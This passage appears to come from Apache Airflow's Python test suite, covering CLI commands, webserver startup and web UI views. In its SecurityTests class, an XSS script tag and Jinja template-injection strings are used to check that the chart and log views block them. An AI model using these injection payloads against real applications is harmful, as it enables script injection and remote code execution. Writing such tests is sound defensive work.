'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:******@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:******@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [line for line in stdout.split('\n') if len(line) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_delete_dag_existing_file(self):
# Test to check that the DAG should be deleted even if
# the file containing it is not deleted
DM = DagModel
key = "my_dag_id"
session = settings.Session()
with tempfile.NamedTemporaryFile() as f:
session.add(DM(dag_id=key, fileloc=f.name))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as f:
json.dump(pool_config_input, f)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables(self.parser.parse_args([
'variables', '-s', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables(self.parser.parse_args([
'variables', '-s', 'list', '["oops"]']))
# Set str
cli.variables(self.parser.parse_args([
'variables', '-s', 'str', 'hello string']))
# Set int
cli.variables(self.parser.parse_args([
'variables', '-s', 'int', '42']))
# Set float
cli.variables(self.parser.parse_args([
'variables', '-s', 'float', '42.0']))
# Set true
cli.variables(self.parser.parse_args([
'variables', '-s', 'true', 'true']))
# Set false
cli.variables(self.parser.parse_args([
'variables', '-s', 'false', 'false']))
# Set none
cli.variables(self.parser.parse_args([
'variables', '-s', 'null', 'null']))
# Export and then import
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables3.json']))
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
class TestCliWebServer(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.parser = cli.get_parser()
def setUp(self):
self._check_processes()
self._clean_pidfiles()
def tearDown(self):
self._check_processes()
self._clean_pidfiles()
def _check_processes(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
exit_code_pgrep_webserver = subprocess.Popen(["pgrep", "-c", "-f", "airflow webserver"]).wait()
exit_code_pgrep_gunicorn = subprocess.Popen(["pgrep", "-c", "-f", "gunicorn"]).wait()
if exit_code_pgrep_webserver != 1 or exit_code_pgrep_gunicorn != 1:
subprocess.Popen(["ps", "-ax"]).wait()
if exit_code_pgrep_webserver != 1:
subprocess.Popen(["pkill", "-9", "-f", "airflow webserver"]).wait()
if exit_code_pgrep_gunicorn != 1:
subprocess.Popen(["pkill", "-9", "-f", "gunicorn"]).wait()
raise AssertionError(
"Background processes are running that prevent the test from passing successfully."
)
def _clean_pidfiles(self):
pidfile_webserver = cli.setup_locations("webserver")[0]
pidfile_monitor = cli.setup_locations("webserver-monitor")[0]
if os.path.exists(pidfile_webserver):
os.remove(pidfile_webserver)
if os.path.exists(pidfile_monitor):
os.remove(pidfile_monitor)
def _wait_pidfile(self, pidfile):
start_time = time()
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception: # pylint: disable=broad-except
if start_time - time() > 60:
raise
sleep(1)
def test_cli_webserver_foreground(self):
with mock.patch.dict(
"os.environ",
AIRFLOW__CORE__DAGS_FOLDER="/dev/null",
AIRFLOW__CORE__LOAD_EXAMPLES="False",
AIRFLOW__WEBSERVER__WORKERS="1"
):
# Run webserver in foreground and terminate it.
proc = subprocess.Popen(["airflow", "webserver"])
self.assertEqual(None, proc.poll())
# Wait for process
sleep(10)
# Terminate webserver
proc.terminate()
with timeout(60):
# -15 - the server was stopped before it started
# 0 - the server terminated correctly
self.assertIn(proc.wait(), (-15, 0))
def test_cli_webserver_foreground_with_pid(self):
with TemporaryDirectory(prefix='tmp-pid') as tmpdir:
pidfile = "{}/pidfile".format(tmpdir)
with mock.patch.dict(
"os.environ",
AIRFLOW__CORE__DAGS_FOLDER="/dev/null",
AIRFLOW__CORE__LOAD_EXAMPLES="False",
AIRFLOW__WEBSERVER__WORKERS="1"
):
proc = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
self.assertEqual(None, proc.poll())
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
proc.terminate()
with timeout(60):
self.assertEqual(0, proc.wait())
def test_cli_webserver_background(self):
import psutil
with TemporaryDirectory(prefix="gunicorn") as tmpdir, \
mock.patch.dict(
"os.environ",
AIRFLOW__CORE__DAGS_FOLDER="/dev/null",
AIRFLOW__CORE__LOAD_EXAMPLES="False",
AIRFLOW__WEBSERVER__WORKERS="1"):
pidfile_webserver = "{}/pidflow-webserver.pid".format(tmpdir)
pidfile_monitor = "{}/pidflow-webserver-monitor.pid".format(tmpdir)
stdout = "{}/airflow-webserver.out".format(tmpdir)
stderr = "{}/airflow-webserver.err".format(tmpdir)
logfile = "{}/airflow-webserver.log".format(tmpdir)
try:
# Run webserver as daemon in background. Note that the wait method is not called.
proc = subprocess.Popen([
"airflow",
"webserver",
"--daemon",
"--pid", pidfile_webserver,
"--stdout", stdout,
"--stderr", stderr,
"--log-file", logfile,
])
self.assertEqual(None, proc.poll())
pid_monitor = self._wait_pidfile(pidfile_monitor)
self._wait_pidfile(pidfile_webserver)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(
0, subprocess.Popen(["pgrep", "-f", "-c", "airflow webserver --daemon"]).wait()
)
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "-f", "gunicorn: master"]).wait())
# Terminate monitor process.
proc = psutil.Process(pid_monitor)
proc.terminate()
with timeout(120):
self.assertIn(proc.wait(), (0, None))
self._check_processes()
except Exception:
# List all logs
subprocess.Popen(["ls", "-lah", tmpdir]).wait()
# Dump all logs
subprocess.Popen(["bash", "-c", "ls {}/* | xargs -n 1 -t cat".format(tmpdir)]).wait()
raise
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.GunicornMonitor._get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
@conf_vars({('webserver', 'authenticate'): 'False', ('core', 'expose_config'): 'True'})
class SecurityTests(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = BeautifulSoup(response.data, 'html.parser')
return tree.find('input', attrs={'name': '_csrf_token'})['value']
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertNotIn("<script>alert(123456)</script>", response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
@conf_vars({('webserver', 'authenticate'): 'False', ('core', 'expose_config'): 'True'})
class WebUiTests(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
BJ = jobs.BaseJob
session = Session()
# case-1: healthy scheduler status
last_scheduler_heartbeat_for_testing_1 = timezone.utcnow()
session.add(BJ(job_type='SchedulerJob',
state='running',
latest_heartbeat=last_scheduler_heartbeat_for_testing_1))
session.commit()
response_json = json.loads(self.app.get('/health').data.decode('utf-8'))
self.assertEqual('healthy', response_json['metadatabase']['status'])
self.assertEqual('healthy', response_json['scheduler']['status'])
self.assertEqual(last_scheduler_heartbeat_for_testing_1.isoformat(),
response_json['scheduler']['latest_scheduler_heartbeat'])
session.query(BJ).\
filter(BJ.job_type == 'SchedulerJob',
BJ.state == 'running',
BJ.latest_heartbeat == last_scheduler_heartbeat_for_testing_1).\
delete()
session.commit()
# case-2: unhealthy scheduler status - scenario 1 (SchedulerJob is running too slowly)
last_scheduler_heartbeat_for_testing_2 = timezone.utcnow() - timedelta(minutes=1)
(session.query(BJ)
.filter(BJ.job_type == 'SchedulerJob')
.update({'latest_heartbeat': last_scheduler_heartbeat_for_testing_2 - timedelta(seconds=1)}))
session.add(BJ(job_type='SchedulerJob',
state='running',
latest_heartbeat=last_scheduler_heartbeat_for_testing_2))
session.commit()
response_json = json.loads(self.app.get('/health').data.decode('utf-8'))
self.assertEqual('healthy', response_json['metadatabase']['status'])
self.assertEqual('unhealthy', response_json['scheduler']['status'])
self.assertEqual(last_scheduler_heartbeat_for_testing_2.isoformat(),
response_json['scheduler']['latest_scheduler_heartbeat'])
session.query(BJ).\
filter(BJ.job_type == 'SchedulerJob',
BJ.state == 'running',
BJ.latest_heartbeat == last_scheduler_heartbeat_for_testing_1).\
delete()
session.commit()
# case-3: unhealthy scheduler status - scenario 2 (no running SchedulerJob)
session.query(BJ).\
filter(BJ.job_type == 'SchedulerJob',
BJ.state == 'running').\
delete()
session.commit()
response_json = json.loads(self.app.get('/health').data.decode('utf-8'))
self.assertEqual('healthy', response_json['metadatabase']['status'])
self.assertEqual('unhealthy', response_json['scheduler']['status'])
self.assertIsNone(response_json['scheduler']['latest_scheduler_heartbeat'])
session.close()
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=missing_dag',
follow_redirects=True)
self.assertIn("seems to be missing", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.post("/admin/airflow/success", data=dict(
task_id="print_the_context",
dag_id="example_python_operator",
success_upstream="false",
success_downstream="false",
success_future="false",
success_past="false",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin"))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.post('/admin/airflow/clear', data=dict(
task_id="print_the_context",
dag_id="example_python_operator",
future="true",
past="false",
upstream="true",
downstream="false",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin"))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
form = dict(
task_id="section-1",
dag_id="example_subdag_operator",
success_upstream="true",
success_downstream="true",
success_future="false",
success_past="false",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin")
response = self.app.post("/admin/airflow/success", data=form)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
form["confirmed"] = "true"
response = self.app.post("/admin/airflow/success", data=form)
self.assertEqual(response.status_code, 302)
form = dict(
task_id="print_the_context",
dag_id="example_python_operator",
future="false",
past="false",
upstream="false",
downstream="true",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin")
response = self.app.post("/admin/airflow/clear", data=form)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
form["confirmed"] = "true"
response = self.app.post("/admin/airflow/clear", data=form)
self.assertEqual(response.status_code, 302)
form = dict(
task_id="section-1-task-1",
dag_id="example_subdag_operator.section-1",
future="false",
past="false",
upstream="false",
downstream="true",
recursive="true",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
